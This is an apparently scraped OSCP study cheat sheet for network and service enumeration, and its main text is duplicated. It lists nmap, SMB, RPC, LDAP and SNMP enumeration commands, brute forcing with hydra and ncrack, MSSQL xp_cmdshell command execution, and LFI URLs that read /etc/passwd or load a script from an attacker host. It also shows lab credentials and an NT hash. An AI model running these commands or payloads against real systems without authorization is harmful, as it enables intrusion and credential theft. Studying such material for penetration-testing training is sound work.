Enumeration (정보 수집 및 열거)

All you need to know about basic host-based enumeration for OSCP

Network Discovery

Common Nmap Scan

nmap -sV -sT -sC -T5 -v -A $targetip

-sV (Version detection)
-sT (TCP connect scan)
-sC (Performs a script scan using the default set of scripts)
-T5 (Insane mode)
-v (Increase verbosity level)
-A (OS Detection)

All TCP port scan

nmap -p- -sT -v $targetip

All UDP Port Scan (With Service and Script Scan)

nmap -p- -sV -sU -sC $targetip

100 most common ports

nmap $targetip -F 100

Nmap Script Scan

Find the nse scripts

locate *.nse | grep <script.nse>

For example, the below command will find smb scripts.

locate *.nse | grep smb

Scan using a specific NSE script

nmap -sV -p 443 --script=ssl-heartbleed.nse $targetip

For example, below command will find any smb scripts running on port 139 & 445.

nmap -p 139,445 --script=smb-* $targetip

All smb scripts:

nmap --script smb-vuln* -p 139,445 [ip]

SMB share paths enumeration:

nmap --script smb-enum-shares -p 139,445 [ip]

Using Metasploit portscan

use auxiliary/scanner/portscan/

Service Discovery

Port 80 & 443 - Web Discovery

Find SSL Heartbleed Vulnerablity

sslscan $targetip:443

nmap -sV --script=ssl-heartbleed 192.168.101.8

Scan Web Servers

Nikto -h $targethost -p $targetport

Dictionary Attacks for finding hidden web objects

gobuster dir –url http://$targetip -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x aspx,php

You can also use the common web_content list.

/usr/share/seclists/Discovery/Web_Content/common.txt

For cgi-bin,

gobuster dir –url http://$targetip/cgi-bin/ -w /usr/share/seclists/Discovery/Web_Content/cgis.txt -x aspx,php

Or for faster scan

ffuf -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt -u 
http://$targetIP/FUZZ/something

Port 445 - SMB Discovery

To discover “All” of SMB

enum4linux -a $targetip

To discover the userlist

enum4linux -U $targetip

You can create a username list with awk.

cat user.txt | awk -F'[][]' '{print $2}' >> users.txt

enum4linux -s file

To find Password Policy

enum4linux -p $targetip

Alternative samba enumeration using smbmap

smbmap -H $targetip -d $domain -R

You can download file by smbmap directly from the victim host

smbmap -H 10.10.10.100 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18 --download "Users\SVC_TGS\Desktop\user.txt"

SMBCLIENT copying whole directory

mount -t cifs //IPADDESS/SHARE /mnt -o "user=SMBUSER,password=SMBPASS"

Check the list of shares via SMB null session

smbclient –list //$targetip/ -U ‘’ -N

smbclient \\$targetip\\$share

smbclient to list out share paths with sambaNTPasswrod

smbclient -U alice1978%0B186E661BBDBDCF6047784DE8B9FD8B --pw-nt-hash -L //ypuffy.htb/

Useful SMB commands

get $file to extract file to your host.
put $file to inject file to the victim.

Port 135 - RPC Discovery

rpcclient -U "" $targetip

Then use the below commands for more information

srvinfo
enumdomusers
getdompwinfo
querydominfo
netshareenum
netshareenumall

rpcbind -p 192.168.1.101

Port 389 & 636 for SSL - LDAP Discovery

ldapsearch -h 192.168.1.101 -p 389 -x -b "dc=mywebsite,dc=com"

or using nmap

nmap -p 389 --script ldap-search ypuffy.htb

Port 21 - FTP Discovery

ftp $targetip
nc $targetip 21

Port 3306 - MySQL

mysql --host=$targetip -u root -p

telnet 192.168.0.101 3306

ERROR 1130 (HY000): Host '192.168.0.101' is not allowed to connect to this MySQL server means only localhost can log in as root.

SQL Password Storage

You can check the web server configuration php file if it contains any credentials.

/var/www/html/configuration.php

Port 3389 - RDP

RDP to Windows

rdesktop -u $username -p $password <IP>

Ruby winrm package from

gem install -r winrm
ruby winrm_shell.rb

Bruteforce RDP

ncrack -vv --user Administrator -P /root/passwords.txt rdp://192.168.1.101

Port 21 - FTP

ftp $targetip

nc $targetip 21

Port 22 - SSH

Information Gathering using nc

nc -nv  10.11.1.71 22

The target OS is "Ubuntu", using "OpenSSH v6.6" (and package is 2ubuntu2)

ssh -i id_rsa alice1978@ypuffy.htb

ssh-gen

/usr/bin/ssh-keygen -s /home/userca/ca -n 3m3rgencyB4ckd00r -I root .ssh/id_rsa

Bruteforce SSH Credential with hydra

hydra -l admin -P /usr/share/wordlists/rockyou.txt $ip ssh -t 5

Port 161 UDP - SNMP

snmpwalk -c public -v 1 10.10.10.116

To check if snmp port is opened

nc -nv -u -z -w 1 10.11.1.73 160-162

Port 88 - Kerberos

Bruteforce the username list with nmap script.

nmap -p88 --script=krb5-enum-users --script-args krb5-enum-users.realm='HTB',userdb=/root/oscp/forest/users.txt 10.10.10.161

Port 1433 -SQL

Command Injection using nmap

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=poiuytrewq,mssql.database=bankdb,ms-sql-xp-cmdshell.cmd="whoami" 10.11.1.31

Telnet - 25

telnet $targetip 25

Finding known exploits from Exploit-DB

To update to latest Exploit-DB

searchsploit -u

To find a exploit

searchsploit $item

To copy the file to your current directory.

searchsploit -m $item

To find item wihtout DOS attack

searchsploit apache 2.x | grep -v '/dos/'

Local File inclusions

Simple test if the target is vulnerable to LFI

http://target.com/?page=./../../../../../../../../../etc/passwd%00

Simple test if you can run a local script against the target

http://target.com/?page=http://hackerip/evil.txt%00

PreviousHost-based 공격 CheatSheet (FEAT. OSCP)NextExploitation (공격)

Last updated 1 year ago

Enumeration (정보 수집 및 열거)

All you need to know about basic host-based enumeration for OSCP

Network Discovery

Common Nmap Scan

nmap -sV -sT -sC -T5 -v -A $targetip

-sV (Version detection)
-sT (TCP connect scan)
-sC (Performs a script scan using the default set of scripts)
-T5 (Insane mode)
-v (Increase verbosity level)
-A (OS Detection)

All TCP port scan

nmap -p- -sT -v $targetip

All UDP Port Scan (With Service and Script Scan)

nmap -p- -sV -sU -sC $targetip

100 most common ports

nmap $targetip -F 100

Nmap Script Scan

Find the nse scripts

locate *.nse | grep <script.nse>

For example, the below command will find smb scripts.

locate *.nse | grep smb

Scan using a specific NSE script

nmap -sV -p 443 --script=ssl-heartbleed.nse $targetip

For example, below command will find any smb scripts running on port 139 & 445.

nmap -p 139,445 --script=smb-* $targetip

All smb scripts:

nmap --script smb-vuln* -p 139,445 [ip]

SMB share paths enumeration:

nmap --script smb-enum-shares -p 139,445 [ip]

Using Metasploit portscan

use auxiliary/scanner/portscan/

Service Discovery

Port 80 & 443 - Web Discovery

Find SSL Heartbleed Vulnerablity

sslscan $targetip:443

nmap -sV --script=ssl-heartbleed 192.168.101.8

Scan Web Servers

Nikto -h $targethost -p $targetport

Dictionary Attacks for finding hidden web objects

gobuster dir –url http://$targetip -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x aspx,php

You can also use the common web_content list.

/usr/share/seclists/Discovery/Web_Content/common.txt

For cgi-bin,

gobuster dir –url http://$targetip/cgi-bin/ -w /usr/share/seclists/Discovery/Web_Content/cgis.txt -x aspx,php

Or for faster scan

ffuf -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt -u 
http://$targetIP/FUZZ/something

ffuf Github link:

Port 445 - SMB Discovery

To discover “All” of SMB

enum4linux -a $targetip

To discover the userlist

enum4linux -U $targetip

You can create a username list with awk.

cat user.txt | awk -F'[][]' '{print $2}' >> users.txt

enum4linux -s file

To find Password Policy

enum4linux -p $targetip

Alternative samba enumeration using smbmap

smbmap -H $targetip -d $domain -R

You can download file by smbmap directly from the victim host

smbmap -H 10.10.10.100 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18 --download "Users\SVC_TGS\Desktop\user.txt"

SMBCLIENT copying whole directory

mount -t cifs //IPADDESS/SHARE /mnt -o "user=SMBUSER,password=SMBPASS"

Check the list of shares via SMB null session

smbclient –list //$targetip/ -U ‘’ -N

smbclient \\$targetip\\$share

smbclient to list out share paths with sambaNTPasswrod

smbclient -U alice1978%0B186E661BBDBDCF6047784DE8B9FD8B --pw-nt-hash -L //ypuffy.htb/

Useful SMB commands

get $file to extract file to your host.
put $file to inject file to the victim.

Port 135 - RPC Discovery

rpcclient -U "" $targetip

Then use the below commands for more information

srvinfo
enumdomusers
getdompwinfo
querydominfo
netshareenum
netshareenumall

rpcbind -p 192.168.1.101

Port 389 & 636 for SSL - LDAP Discovery

ldapsearch -h 192.168.1.101 -p 389 -x -b "dc=mywebsite,dc=com"

or using nmap

nmap -p 389 --script ldap-search ypuffy.htb

Port 21 - FTP Discovery

ftp $targetip
nc $targetip 21

FTP Commands List:

Port 3306 - MySQL

mysql --host=$targetip -u root -p

telnet 192.168.0.101 3306

ERROR 1130 (HY000): Host '192.168.0.101' is not allowed to connect to this MySQL server means only localhost can log in as root.

MYSQL Commands List :

SQL Password Storage

You can check the web server configuration php file if it contains any credentials.

/var/www/html/configuration.php

Port 3389 - RDP

RDP to Windows

rdesktop -u $username -p $password <IP>

Ruby winrm package from

GitHub - WinRb/WinRM: Ruby library for Windows Remote ManagementGitHub

gem install -r winrm
ruby winrm_shell.rb

Bruteforce RDP

ncrack -vv --user Administrator -P /root/passwords.txt rdp://192.168.1.101

Port 21 - FTP

ftp $targetip

nc $targetip 21

Port 22 - SSH

Information Gathering using nc

nc -nv  10.11.1.71 22

The target OS is "Ubuntu", using "OpenSSH v6.6" (and package is 2ubuntu2)

ssh -i id_rsa alice1978@ypuffy.htb

ssh-gen

/usr/bin/ssh-keygen -s /home/userca/ca -n 3m3rgencyB4ckd00r -I root .ssh/id_rsa

Bruteforce SSH Credential with hydra

hydra -l admin -P /usr/share/wordlists/rockyou.txt $ip ssh -t 5

Port 161 UDP - SNMP

snmpwalk -c public -v 1 10.10.10.116

To check if snmp port is opened

nc -nv -u -z -w 1 10.11.1.73 160-162

Port 88 - Kerberos

Bruteforce the username list with nmap script.

nmap -p88 --script=krb5-enum-users --script-args krb5-enum-users.realm='HTB',userdb=/root/oscp/forest/users.txt 10.10.10.161

Port 1433 -SQL

Command Injection using nmap

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=poiuytrewq,mssql.database=bankdb,ms-sql-xp-cmdshell.cmd="whoami" 10.11.1.31

Telnet - 25

telnet $targetip 25

Finding known exploits from Exploit-DB

To update to latest Exploit-DB

searchsploit -u

To find a exploit

searchsploit $item

To copy the file to your current directory.

searchsploit -m $item

To find item wihtout DOS attack

searchsploit apache 2.x | grep -v '/dos/'

Local File inclusions

Simple test if the target is vulnerable to LFI

http://target.com/?page=./../../../../../../../../../etc/passwd%00

Simple test if you can run a local script against the target

http://target.com/?page=http://hackerip/evil.txt%00

PreviousHost-based 공격 CheatSheet (FEAT. OSCP)NextExploitation (공격)

Last updated 1 year ago

Network Discovery

Common Nmap Scan

All TCP port scan

All UDP Port Scan (With Service and Script Scan)

100 most common ports

Nmap Script Scan

Find the nse scripts

Scan using a specific NSE script

Service Discovery

Port 80 & 443 - Web Discovery

Find SSL Heartbleed Vulnerablity

Scan Web Servers

Dictionary Attacks for finding hidden web objects

Port 445 - SMB Discovery

To discover “All” of SMB

To discover the userlist

Bruteforce the share names

To find Password Policy

Alternative samba enumeration using smbmap

SMBCLIENT copying whole directory

Check the list of shares via SMB null session

Connect to a spefic share path you found

Port 135 - RPC Discovery

Port 389 & 636 for SSL - LDAP Discovery

Port 21 - FTP Discovery

Port 3306 - MySQL

SQL Password Storage

Port 3389 - RDP

Port 21 - FTP

Port 22 - SSH

Port 161 UDP - SNMP

Port 88 - Kerberos

Port 1433 -SQL

Telnet - 25

Finding known exploits from Exploit-DB

Local File inclusions

Network Discovery

Common Nmap Scan

All TCP port scan

All UDP Port Scan (With Service and Script Scan)

100 most common ports

Nmap Script Scan

Find the nse scripts

Scan using a specific NSE script

Service Discovery

Port 80 & 443 - Web Discovery

Find SSL Heartbleed Vulnerablity

Scan Web Servers

Dictionary Attacks for finding hidden web objects

Port 445 - SMB Discovery

To discover “All” of SMB

To discover the userlist

Bruteforce the share names

To find Password Policy

Alternative samba enumeration using smbmap

SMBCLIENT copying whole directory

Check the list of shares via SMB null session

Connect to a spefic share path you found

Port 135 - RPC Discovery

Port 389 & 636 for SSL - LDAP Discovery

Port 21 - FTP Discovery

Port 3306 - MySQL

SQL Password Storage

Port 3389 - RDP

Port 21 - FTP

Port 22 - SSH

Port 161 UDP - SNMP

Port 88 - Kerberos

Port 1433 -SQL

Telnet - 25

Finding known exploits from Exploit-DB

Local File inclusions